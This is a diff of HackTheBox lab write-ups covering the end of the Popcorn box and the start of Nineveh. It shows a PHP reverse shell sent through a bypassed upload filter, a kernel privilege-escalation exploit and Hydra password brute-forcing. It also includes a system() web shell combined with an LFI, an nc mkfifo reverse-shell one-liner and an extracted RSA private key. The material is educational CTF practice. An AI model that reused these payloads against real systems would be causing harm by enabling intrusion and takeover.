+ /home/nihilist/Desktop/Tools/hydrus/db/client_files/fb9/b95b541ff079ea281c8f575141a428390189649e6cb9ffc0bd6117467b4f745e.png
+ /home/nihilist/Desktop/Tools/hydrus/db/client_files/tb9/b95b541ff079ea281c8f575141a428390189649e6cb9ffc0bd6117467b4f745e.thumbnail
+ /usr/share/exploitdb/exploits/php/webapps/11746.txt
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → cp /usr/share/exploitdb/exploits/php/webapps/11746.txt .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → cat 11746.txt
+
+
+
+Looking at the results, we seem to be able to gain access to the system through a php upload vulnerability. Moving over to the login page :
+
+
+
+Sending the request by clicking Login, we intercept the request with burpsuite, and copy the request in order to give it to sqlmap.
+
+
+ POST /torrent/login.php HTTP/1.1
+ Host: 10.10.10.6
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://10.10.10.6/torrent/login.php
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 29
+ DNT: 1
+ Connection: close
+ Cookie: /torrent/=; PHPSESSID=3ce0b9e28bbb1e6b0458748643502d21
+ Upgrade-Insecure-Requests: 1
+
+ username=admin&password;=admin
+
+
+saving it as request :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nano request
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → sqlmap -r request --level 5 --risk 3
+ ___
+ __H__
+ ___ ___[)]_____ ___ ___ {1.4.2#stable}
+ |_ -| . [.] | .'| . |
+ |___|_ [']_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 12:12:10 /2020-02-20/
+
+ [12:12:10] [INFO] parsing HTTP request from 'request'
+ [12:12:11] [WARNING] provided value for parameter '/torrent/' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
+ [12:12:11] [INFO] testing connection to the target URL
+ [12:12:11] [INFO] checking if the target is protected by some kind of WAF/IPS
+ [12:12:12] [INFO] testing if the target URL content is stable
+ [12:12:12] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
+ how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
+ [12:12:36] [INFO] testing if POST parameter 'username' is dynamic
+ [12:12:37] [WARNING] POST parameter 'username' does not appear to be dynamic
+ [12:12:37] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
+ [12:12:37] [INFO] heuristic (XSS) test shows that POST parameter 'username' might be vulnerable to cross-site scripting (XSS) attacks
+ [12:12:37] [INFO] testing for SQL injection on POST parameter 'username'
+ it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
+ [12:12:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [12:12:46] [WARNING] reflective value(s) found and filtering out
+ got a 302 redirect to 'http://10.10.10.6/torrent'. Do you want to follow? [Y/n] y
+ redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
+
+
+As sqlmap takes some time to run, let's head over to the signup page and try to create an account
+
+
+
+heading over to the uploading page we'll submit some random torrent file :
+
+
+
+and we have been able to upload it ! Moving over to /torrent/upload we seem to have access to uploaded images :
+
+
+
+let's change the screenshot to a reverse php png shell :
+
+
+ <****?php
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.11/1234 0>&1'");
+ ?****>
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nano nihilist.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → file nihilist.php
+ nihilist.php: PHP script, ASCII text
+
+
+
+as you can see it will be considered as a php script, so that's why we will use burpsuite to intercept our request, and change it before sending it.
+
+ 
+
+Let's see if we can bypass the website filetype checks by changing the aforementionned content type header
+
+
+
+Here we can see that we successfully submitted a PHP file with an image/png request , now let's see if we can browse to it, and catch the incoming reverse shell connection :
+
+ _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → curl -sk http://10.10.10.6/torrent/upload/20bcfc1a2b444bd933eb2d80daa7e2f20d272afe.php
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+ ls
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.6] 43530
+ bash: no job control in this shell
+ www-data@popcorn:/var/www/torrent/upload$ ls
+ 20bcfc1a2b444bd933eb2d80daa7e2f20d272afe.php
+ 20bcfc1a2b444bd933eb2d80daa7e2f20d272afe.png
+ 723bc28f9b6f924cca68ccdff96b6190566ca6b4.png
+ noss.png
+ www-data@popcorn:/var/www/torrent/upload$ whoami
+ whoami
+ www-data
+ www-data@popcorn:/var/www/torrent/upload$ uname -a
+ uname -a
+ Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
+
+
+And that's it ! we have a reverse shell as www-data
+
+
+ www-data@popcorn:/var/www/torrent/upload$ cd /home
+ cd /home
+ www-data@popcorn:/home$ ls
+ ls
+ george
+ www-data@popcorn:/home$ cd george
+ cd george
+ www-data@popcorn:/home/george$ cat user.txt
+ cat user.txt
+ 5eXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Once we are in the /home/george directory, we first list what files are available for us to use so that we can somehow privesc :
+
+
+ www-data@popcorn:/tmp$ uname -a
+ uname -a
+ Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
+
+
+the uname -a command reveals us an outdated kernel version, a quick searchsploit command reveals us that we could use a privilege escalation exploit written in c :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → searchsploit kernel 2.6.37
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privileg | exploits/linux/local/15704.c
+ Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service | exploits/linux/dos/15619.c
+ Linux Kernel 2.6.37 - Local Kernel Denial of Service (1) | exploits/linux/dos/16263.c
+ Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service | exploits/linux/dos/15622.c
+ Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak | exploits/linux/local/18080.c
+ Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation | exploits/linux/local/15774.c
+ Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2 | exploits/linux/dos/16952.c
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → locate 15704.c
+ /usr/share/exploitdb/exploits/linux/local/15704.c
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → cp /usr/share/exploitdb/exploits/linux/local/15704.c .
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → python -m SimpleHTTPServer 7070
+ Serving HTTP on 0.0.0.0 port 7070 ...
+
+
+` _Terminal 2:_
+
+
+
+ www-data@popcorn:/home/george$ which wget
+ which wget
+ /usr/bin/wget
+ www-data@popcorn:/home/george$ which curl
+ which curl
+
+
+Seems like we have both wget and curl to download our exploit from, let's use wget :
+
+
+ www-data@popcorn:/tmp$ wget http://10.10.14.11:7070/15704.c
+ wget http://10.10.14.11:7070/15704.c
+ --2020-02-20 15:16:59-- http://10.10.14.11:7070/15704.c
+ Connecting to 10.10.14.11:7070... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 9487 (9.3K) [text/plain]
+ Saving to: `15704.c'
+
+ 100%[======================================>] 9,487 --.-K/s in 0.1s
+
+ 2020-02-20 15:17:00 (90.6 KB/s) - `15704.c' saved [9487/9487]
+
+
+once we have downloaded our .c exploit, we need to compile it using gcc, add the execution right using chmod +x and executing the executable produced using ./
+
+
+ www-data@popcorn:/tmp$ gcc 15704.c -o nihilist.privesc
+ gcc 15704.c -o nihilist.privesc
+ www-data@popcorn:/tmp$ chmod +x nihilist.privesc
+ chmod +x nihilist.privesc
+ www-data@popcorn:/tmp$ ./nihilist.privesc
+ ./nihilist.privesc
+ [*] Resolving kernel addresses...
+ [+] Resolved econet_ioctl to 0xf83d4280
+ [+] Resolved econet_ops to 0xf83d4360
+ [+] Resolved commit_creds to 0xc01645d0
+ [+] Resolved prepare_kernel_cred to 0xc01647d0
+ [*] Calculating target...
+ [*] Triggering payload...
+ [*] Got root!
+ # cat /root/root.txt
+ cat /root/root.txt
+ f1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/10.md b/Medium/10.md
new file mode 100644
index 0000000..9c1dc12
--- /dev/null
+++ b/Medium/10.md
@@ -0,0 +1,629 @@
+# Nineveh Writeup
+
+
+
+## Introduction :
+
+Nineveh is a medium linux box released back in August 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nmap -F 10.10.10.43
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 11:30 GMT
+ Nmap scan report for 10.10.10.43
+ Host is up (0.098s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 443/tcp open https
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.37 seconds
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nmap -sCV -p80,443 10.10.10.43
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 11:31 GMT
+ Nmap scan report for 10.10.10.43
+ Host is up (0.095s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
+ | Not valid before: 2017-07-01T15:03:30
+ |_Not valid after: 2018-07-01T15:03:30
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.26 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running http , let's dirsearch it :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → dirsearch -u http://10.10.10.43/ -e php,txt,html -t 50 -r
+ git clone https://github.com/maurosoria/dirsearch.git
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, txt, html | HTTP method: get | Threads: 50 | Wordlist size: 6733 | Recursion level: 1
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-25_11-33-44.log
+
+ Target: http://10.10.10.43/
+
+ [11:33:45] Starting:
+ [11:33:47] 403 - 297B - /.ht_wsr.txt
+ [11:33:47] 403 - 290B - /.hta
+ [11:33:47] 403 - 299B - /.htaccess-dev
+ [11:33:47] 403 - 301B - /.htaccess-local
+ [11:33:47] 403 - 301B - /.htaccess-marco
+ [11:33:47] 403 - 299B - /.htaccess.BAK
+ [11:33:47] 403 - 300B - /.htaccess.bak1
+ [11:33:47] 403 - 299B - /.htaccess.old
+ [11:33:47] 403 - 300B - /.htaccess.orig
+ [11:33:47] 403 - 300B - /.htaccess.save
+ [11:33:47] 403 - 302B - /.htaccess.sample
+ [11:33:47] 403 - 299B - /.htaccess.txt
+ [11:33:47] 403 - 301B - /.htaccess_extra
+ [11:33:47] 403 - 300B - /.htaccess_orig
+ [11:33:47] 403 - 298B - /.htaccess_sc
+ [11:33:47] 403 - 298B - /.htaccessBAK
+ [11:33:47] 403 - 298B - /.htaccessOLD
+ [11:33:47] 403 - 299B - /.htaccessOLD2
+ [11:33:47] 403 - 296B - /.htaccess~
+ [11:33:47] 403 - 294B - /.htgroup
+ [11:33:47] 403 - 299B - /.htpasswd-old
+ [11:33:47] 403 - 300B - /.htpasswd_test
+ [11:33:47] 403 - 296B - /.htpasswds
+ [11:33:47] 403 - 294B - /.htusers
+ [11:34:02] 200 - 178B - /index.md
+ [11:34:02] 200 - 83KB - /info.php
+
+
+Our dirsearch found the info.php webpage :
+
+
+
+So now we know the box is running php version 7.0.18 on apache2.0. Before our nmap scan picked up the domain name nineveh.htb so let's add it to our /etc/hosts file.
+
+
+
+Let's not forget that we picked up port 443 running https earlier, so let's see what we can find there :
+
+
+
+And we get something different ! Now let's enumerate what we can find on this using dirsearch once again :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → dirsearch -u https://nineveh.htb/ -t 50 -x 403 -r -e php,html,txt
+ git clone https://github.com/maurosoria/dirsearch.git
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, txt | HTTP method: get | Threads: 50 | Wordlist size: 6733 | Recursion level: 1
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-25_12-05-15.log
+
+ Target: https://nineveh.htb/
+
+ [12:05:15] Starting:
+ [12:05:34] 301 - 309B - /db -> https://nineveh.htb/db/
+ [12:05:34] 200 - 11KB - /db/
+ [12:05:38] 200 - 49B - /index.md
+ [12:05:50] Starting: db/
+ [12:06:09] 200 - 11KB - /db/index.php
+ [12:06:09] 200 - 11KB - /db/index.php/login/
+
+ Task Completed
+
+
+And we get something else interesting ! let's check out /db :
+
+
+
+And we seem to get a phpLiteAdmin v1.9 login page with the following intercepted request :
+
+
+
+Let's see if we can enumerate port 80 a little further using the domain name nineveh.htb, but this time using gobuster :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → gobuster dir --url http://nineveh.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://nineveh.htb/
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/02/25 12:55:13 Starting gobuster
+ ===============================================================
+ /department (Status: 301)
+
+
+And we found the /department directory which redirects us to a login page which has a preety straightforward login request :
+
+
+
+Now for this next part let's use hydra to try and bruteforce the admin user password using rockyou.txt :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -V -f http-post-form '/department/login.php:username=^USER^&password;=^PASS^:invalid password'
+ Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-25 13:06:02
+ [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
+ [DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=^USER^&password;=^PASS^:invalid password
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "12345" - 2 of 14344399 [child 1] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "password" - 4 of 14344399 [child 3] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "princess" - 6 of 14344399 [child 5] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
+
+ [...]
+
+ [STATUS] 1523.00 tries/min, 4569 tries in 00:03h, 14339830 to do in 156:56h, 16 active
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "lissette" - 4570 of 14344399 [child 12] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "jamila" - 4571 of 14344399 [child 10] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "hotmail1" - 4572 of 14344399 [child 6] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "hoover" - 4573 of 14344399 [child 1] (0/0)
+ [80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t
+ [STATUS] attack finished for 10.10.10.43 (valid pair found)
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-25 13:09:05
+
+
+and we have credentials ! **admin:1q2w3e4r5t** , once logged in :
+
+
+
+Although sadly there doesn't seem to be much more to see here apart from the visible LFI when browsing to the url **http://nineveh.htb/department/manage.php?notes=/path/to/file**. let's try and go back to our previous https://nineveh.htb/db/ phpLiteAdmin login page by hydra the same way we previously did :
+
+
+ POST /db/index.php HTTP/1.1
+ Host: nineveh.htb
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: https://nineveh.htb/db/
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 55
+ DNT: 1
+ Connection: close
+ Cookie: PHPSESSID=cer8n35tvn02re6go6j6tbm391
+ Upgrade-Insecure-Requests: 1
+
+ password=nihilist&remember;=yes&login;=Log+In&proc;_login=true
+
+
+So that's our login request that we interecepted with burpsuite , now let's use the appropriate hydra command :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → hydra -l admin -P /usr/share/wordlists/rockyou.txt nineveh.htb -V -f https-post-form '/db/index.php:password=^PASS^&remember;=yes&logn;=Log+In&proc;_login=true:Incorrect password'
+ Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-25 13:32:40
+ [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
+ [DATA] attacking http-post-forms://nineveh.htb:443/db/index.php:password=^PASS^&remember;=yes&logn;=Log+In&proc;_login=true:Incorrect password
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "12345" - 2 of 14344399 [child 1] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "password" - 4 of 14344399 [child 3] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "princess" - 6 of 14344399 [child 5] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
+
+ [...]
+
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "juventus" - 1397 of 14344399 [child 11] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "mahalkoh" - 1398 of 14344399 [child 7] (0/0)
+ ^[[B[ATTEMPT] target nineveh.htb - login "admin" - pass "esteban" - 1399 of 14344399 [child 6] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "mookie" - 1400 of 14344399 [child 5] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "fresita" - 1401 of 14344399 [child 12] (0/0)
+ [443][http-post-form] host: nineveh.htb login: admin password: password123
+ [STATUS] attack finished for nineveh.htb (valid pair found)
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-25 13:34:19
+
+
+And we have it ! we have our credentials **password123** , now once we are logged in we are greeted with a dashboard :
+
+
+
+Now let's run a searchsploit command to see if we have any public exploits for us to use :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → searchsploit phpliteadmin
+ ---------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ---------------------------------------------------------------- ----------------------------------------
+ PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | exploits/php/webapps/24044.txt
+ phpLiteAdmin - 'table' SQL Injection | exploits/php/webapps/38228.txt
+ phpLiteAdmin 1.1 - Multiple Vulnerabilities | exploits/php/webapps/37515.txt
+ phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | exploits/php/webapps/39714.txt
+ ---------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → locate 24044.txt
+ /usr/share/exploitdb/exploits/php/webapps/24044.txt
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → cp /usr/share/exploitdb/exploits/php/webapps/24044.txt .
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → nano 24044.txt
+
+
+looking at the exploit 24044 we see that once logged in, we should be able to create a database with the .php extension, and within said table we can inject a command execution payload :
+
+
+
+You need to be aware though that the page we had before on **http://nineveh.htb/department/management.php** refers to a note named ninevehNotes.txt so if you decide to use another name for your malicious database, **it will not work as intended**. Once we're done naming the database correctly we create **a table** containing our **php RCE** content in the field, choosing **TEXT** as the type :
+
+
+ <****?php echo system($_REQUEST["cmd"]); ?****>
+
+` 
+
+and hitting "create" we see that we have successfully created the table we intended :
+
+
+ Table 'nihilist.php' has been created.
+ CREATE TABLE 'nihilist.php' ('<****?php echo system($_REQUEST["cmd"]); ?****>' TEXT)
+
+Once we're done here let's return to our previous url http://nineveh.htb/department/manage.php and this time trying to access our nihilist.php using the following URL :
+
+
+ http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd;=uname -a;which nc
+
+
+` 
+
+And we get remote code execution ! now let's try a reverse shell one liner connecting back to our port 9001 (which we have ready to listen with a nc -lvnp command.) but to do so, we first need to url encode our reverse shell one liner :
+
+
+ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 9001 >/tmp/f
+ rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.20+9001+>/tmp/f
+
+
+once url encoded we have the following url to browse to :
+
+
+ http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd;=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.20+9001+>/tmp/f
+
+
+` 
+
+and we get a reverse shell ! let's try to print out the user flag :
+
+
+ $ cd /home
+ $ ls
+ amrois
+ $ cd amrois
+ $ ls
+ user.txt
+ $ cat user.txt
+ cat: user.txt: Permission denied
+
+
+although as you can see, we do not have enough permissions to print out the user flag. so in order to do so we need to take a look at /var/www/ssl/secure_notes
+
+
+ $ cd /var/www/ssl/secure_notes
+ $ ls
+ index.html
+ nineveh.png
+
+
+browsing to this nineveh.png image, we are greeted with a 1497x746 png image :
+
+
+
+Let's first download it and run strings on it, to see if we can extract any useful hidden information :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → file nineveh.png
+ nineveh.png: PNG image data, 1497 x 746, 8-bit/color RGB, non-interlaced
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → strings nineveh.png
+
+
+running the strings command we successfully revealled both a private and a public ssh key :
+
+
+ 13126045656
+ 014730
+ ustar
+ www-data
+ www-data
+ **-----BEGIN RSA PRIVATE KEY-----
+ MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
+ H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
+ PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
+ FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
+ 3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
+ X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
+ KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
+ FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
+ GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
+ JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
+ 9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
+ Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
+ ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
+ 1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
+ vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
+ DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
+ P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
+ fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
+ tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
+ iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
+ MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
+ PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
+ i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
+ il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
+ fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
+ -----END RSA PRIVATE KEY-----**
+ secret/nineveh.pub
+ 0000644
+ 0000041
+ 0000041
+ 00000000620
+ 13126060277
+ 014541
+ ustar
+ www-data
+ www-data
